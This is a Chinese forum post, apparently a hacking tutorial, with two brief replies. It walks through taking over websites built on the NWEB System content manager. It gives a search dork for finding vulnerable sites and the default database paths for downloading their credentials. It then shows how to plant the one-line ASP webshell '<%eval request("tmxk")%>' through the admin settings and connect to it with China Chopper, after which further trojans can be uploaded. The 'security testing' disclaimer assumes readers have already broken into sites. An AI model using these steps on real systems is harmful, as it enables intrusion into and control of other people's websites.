记一次万博企业网站系统(NWEB System)后台拿Webshell

氷刀

本人技术不是太好，文章写的不好的地方还请大家见谅。

万博企业网站系统(NWEB System)

关键字：inurl:system/adminlogin.asp

后台地址：http://域名/system/adminlogin.asp

数据库地址：http://域名/Database/NwebCn_Site.mdb


‘网站数据：/Database/NwebCn_Site.mdb (常规内容数据库)
‘　　　　　/Database/Bak_NwebCn_Site.mdb (备份内容数据库)
‘　　　　　/Database/NwebCn_Stat.mdb (常规流量数据库)
‘　　　　　/Database/Bak_NwebCn_Stat.mdb (备份流量数据库)
‘常量配置：/Include/Const.asp (如果你更改过数据库存放路径或文件名，相应常量在此文件作修改)

利用文件：http://域名/Include/Const.asp

利用代码：<%eval request("tmxk")%>

1.打开目标站点



2.在目标站点后面加上  /Database/NwebCn_Site.mdb  下载站点数据库，也就是：http://域名/Database/NwebCn_Site.mdb



3.打开数据库解密文



4.获取明文后登录后台





5.在左侧菜单选择“系统管理”→“常规设置”



6.重点来了  在哪里？ 你们懂得
就是一句话  看到没   我们把双引号里面的c改成tmxk  然后保存



7.菜刀连接地址出来了



8.菜刀连接地址：http://域名/Include/Const.asp
我们直接打开是个空白页  你们都懂


9.既然是空白页  那我们就用菜刀连接试试



10.连接成功



数据还有点多的




网马什么的就不一一截图出来了，经测试，可直接上传小马、大马等，貌似服务器没装防火墙，教程到此结束，谢谢！

友情提示：此次教程仅出于安全检测，借鉴此帖者，成功渗透某些站点后切勿随便修改网站程序，以免带来不必要的麻烦！

smhm

赞个

smhm

数据库地址是怎么猜出来的